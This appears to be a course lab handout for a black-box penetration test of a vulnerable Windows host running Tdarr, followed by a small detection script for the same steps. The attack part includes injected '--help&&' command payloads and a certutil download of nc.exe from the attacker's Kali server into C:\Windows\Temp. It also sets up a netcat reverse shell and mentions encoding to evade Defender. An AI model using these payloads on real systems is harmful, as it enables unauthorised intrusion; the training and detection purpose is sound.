Lab: Penetration Testing Lab
Introduction to the Lab
This is a penetration testing lab created to simulate a real-life penetration test against a Windows 2016 domain controller. This lab was customized specially for you using DetectionLab.
This lab is divided into 6 parts, and we will follow the penetration testing phases.
1. Planning
2. Reconnaissance and Information Gathering
3. Enumeration and scanning
4. Attack/gaining access and Exploitation
5. Persistence
6. Analysis and reporting
Requirements
- Kali Linux
- Install Nessus on Ubuntu, Windows, or any OS of your choice (optional). Bonus: 2 marks for running a Nessus credentialed scan on the target.
- (Optional) Show another way to get a reverse shell and earn a 2-mark bonus. We used netcat in this lab; show another way to earn the bonus (either this or the Nessus scan counts for the bonus marks).
- The vulnerable Windows machine provided by the instructor
Phases of a Penetration Test
Part 1: Planning
Rules of engagement document - We already have the rules of engagement for the client. See below.
Scope of Work
The client requests that an engineer conduct an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black-box penetration test).
Additionally, the client has provided the following scope allowances:
- Any tools or techniques are permitted in this engagement; however, we ask that you attempt manual exploitation first
- Locate and note all vulnerabilities found
- Only the IP address assigned to your machine is in scope
- Rules of engagement completed
- Signing and Kickoff Call
Part 2: Reconnaissance and Information Gathering
1. Netdiscover - Netdiscover is a simple ARP scanner that can be used to find live hosts on a network
- Run netdiscover to discover all live hosts within our subnet
o Command: netdiscover -i eth0 (this lists every IP address found within the subnet)
Part 3: Enumeration and scanning
In this phase, we begin by starting our scans. We start them first because a scan may take some time, depending on the vulnerabilities present on the target host.
1. Run Nessus and Nmap
• Please note Nessus is optional for your assignment
2. Nessus (optional)
• Nessus is a remote security scanning tool that scans a computer and reports any vulnerabilities it finds
o Scan your target host
3. Nmap - Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses
• Run an nmap scan against the target. Make sure to scan all ports.
o Command: nmap -sV -sC -p- TargetIP
4. OSINT: We will do some open-source intelligence gathering to learn more about the discovered ports and services (wait, let's run our Nessus scan first (optional))
• The web application we are researching is Tdarr
Tdarr is a popular conditional transcoding application for processing large (or small) media libraries, and the proof of concept for the exploit was released on 10 March 2022. I believe it is really cool to play with an exploit that was released just last week and does not have a patch yet.
Let's do some more enumeration using a few more tools
Nikto: Nikto is a free command-line vulnerability scanner that checks web servers for dangerous files/CGIs, outdated server software and other problems
• Command: nikto -h "IP address"
o E.g. nikto -h http://192.168.80.212:8266
5. Dirbuster (here we use the command-line tool dirb)
• Dirbuster is a tool used to brute-force web directories and file names (URIs)
o Command: dirb http://IPAddress:port (sometimes the application just uses the default port, 80 or 443)
E.g. dirb http://192.168.80.218:8266
After the first three stages of our methodology, it's time to do some exploitation. Follow the demo from class to exploit the vulnerability, or follow the steps in Part 4.
Part 4: Attack/gaining access and Exploitation
Time to have some fun. Once the vulnerability has been detected during scanning and enumeration, we will see how to gain internal information about our victim by exploiting it. Information worth gathering after exploiting this vulnerability includes the internal IP address and the services running, which help us exploit our target system.
Just as we did in class, interact with the internal host through the vulnerable application using its vulnerability. Make sure to take screenshots; you will need them for your report.
Run the following:
• --help&&ipconfig
• --help&&whoami
• --help&&ping 8.8.8.8 (let's see if our host can reach the internet)
• --help&&ping "YourKaliIP" (check whether the victim can ping your Kali IP address)
The next step is to try to gain access to our target system through remote code execution.
In this demonstration, we will use a tool called netcat. We will transfer netcat to our victim machine using another tool called certutil
(we have to live off the land). Check out this great resource later for tools penetration testers use to live off the land: "https://lolbas-project.github.io/"
1. Netcat: Netcat, aka nc, is an extremely versatile tool. It lets users connect to specific ports and send and receive data. It also lets machines receive data and connections on specific ports, which makes nc a very popular tool for gaining access.
• Search for netcat on your Kali using the command: locate nc.exe
• Make a copy of netcat into your present directory using the command:
o cp /usr/share/path/path/nc.exe .
o E.g. cp /usr/share/windows-resources/binaries/nc.exe .
2. Python HTTP server: Host a Python HTTP server on your Kali Linux to serve your nc.exe binary to the victim machine.
Note: we will send this to the Temp folder because Windows Defender would block and delete it in a regular folder. Sometimes Windows Defender also blocks binaries dropped in the Temp folder; as penetration testers, we can base64-encode the binary to get it past Windows Defender. That is beyond the scope of this class.
• Command to host the HTTP server: python -m http.server 80
• Note: Run your HTTP server in the same folder your netcat was copied into, and leave it running while you open another command-line tab in your Kali VM
Now that our HTTP server is running, we can run a command on our victim to download nc.exe into the victim's Temp folder.
3. Certutil: This is a Windows binary used for handling certificates; we will use it to transfer files in this lab
• Command to transfer a file (run this command on the vulnerable web application):
• --help&&certutil.exe -f -split -urlcache http://YourKaliIP/nc.exe C:\Windows\Temp\nc.exe
E.g. --help&&certutil.exe -f -split -urlcache http://192.168.80.182/nc.exe C:\Windows\Temp\nc.exe
Note: make sure your HTTP server is running in the folder where your nc.exe is saved. If the server is not running, or is running from a different folder, the download will fail.
You should see a success message after running this command (take a screenshot of it; you will need it for your report).
4. Transfer confirmation: Confirm that nc.exe reached the victim machine with the command below, which lists the files in the Temp folder:
• --help&&dir C:\windows\Temp\
5. Remote code execution: Remote Code Execution (RCE), also known as Arbitrary Code Execution, describes a form of cyberattack in which the attacker can run commands of their own choosing on another person's computer or computing device.
6. Reverse shell
A reverse shell is a type of shell in which the target machine connects back to the attacking machine. The attacking machine runs a listener on a port, receives the connection from the target, and through that connection obtains code or command execution on the target.
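From the defender's side, the Part 4 steps leave a recognizable trail in process-creation telemetry (Sysmon Event ID 1, or Windows Security event 4688 with command-line auditing enabled). The script below is an added example written for this handout, not part of the lab or of Tdarr: it runs three checks over constructed sample events and flags the certutil download, an executable under C:\Windows\Temp, and a cmd.exe carrying the injected --help&& chain. It assumes the injected text appears verbatim in the child process command line; the sample events and the IP address are constructed from the lab's own values.

```python
import re

# Constructed sample process-creation events: (image name, command line).
# These are made-up log entries modelled on the lab steps, not real host telemetry.
SAMPLE_EVENTS = [
    ("cmd.exe", "cmd.exe /c --help&&ipconfig"),
    ("certutil.exe",
     r"certutil.exe -f -split -urlcache http://192.168.80.182/nc.exe C:\Windows\Temp\nc.exe"),
    ("certutil.exe", r"certutil.exe -verify C:\certs\server.cer"),
    ("nc.exe", r"C:\Windows\Temp\nc.exe 192.168.80.182 4444"),
    ("svchost.exe", "svchost.exe -k netsvcs"),
]

# An .exe path under C:\Windows\Temp anywhere in the command line (case-insensitive).
TEMP_EXE = re.compile(r"\\windows\\temp\\[^\s\"']+\.exe", re.IGNORECASE)
HTTP_URL = re.compile(r"https?://", re.IGNORECASE)


def inspect_event(image, cmdline):
    """Return the lab-specific indicator names matched by one process-creation event."""
    findings = []
    low = cmdline.lower()
    # 1. certutil fetching a file over HTTP: the LOLBin download from Part 4, step 3.
    #    Legitimate certutil use (e.g. -verify on a local file) is not flagged.
    if image.lower() == "certutil.exe" and "-urlcache" in low and HTTP_URL.search(low):
        findings.append("certutil-http-download")
    # 2. An executable written to or started from C:\Windows\Temp (where nc.exe lands).
    if TEMP_EXE.search(cmdline):
        findings.append("exe-in-windows-temp")
    # 3. A shell whose command line carries the '--help&&' chain injected via the web app.
    if image.lower() == "cmd.exe" and "--help&&" in low:
        findings.append("help-flag-command-chain")
    return findings


def scan(events):
    """Map the index of every flagged event to its findings; clean events are omitted."""
    hits = {}
    for i, (image, cmdline) in enumerate(events):
        findings = inspect_event(image, cmdline)
        if findings:
            hits[i] = findings
    return hits


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {SAMPLE_EVENTS[idx][1]!r} -> {', '.join(names)}")
```

On a real host the same three checks can be pointed at exported Sysmon or 4688 command lines instead of the constructed list.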
Part 5: Persistence
Remember, we do not need to establish persistence because we are not attackers; we are ethical hackers/penetration testers. We just want to show our client that we were able to breach their network and provide adequate evidence that this occurred.
Part 6: Analysis and Reporting
Create a detailed report showing the steps you carried out in this penetration test, using the template provided by the instructor.
Your report should have the following sections:
o Table of Contents
o Purpose
o Scope
o Executive Summary (remember, executive summaries are for executives, so make sure this section is non-technical)
o Technical details (this includes all your findings with screenshots, e.g. your nmap scan results, Nikto results, proof of exploit on the vulnerable machine, etc.)
o Your report should include at least 20 screenshots of your methodology
o See the sample reports provided by the instructor on DC Connect for guidance
Attachment: Penetration_Testing_Lab.rar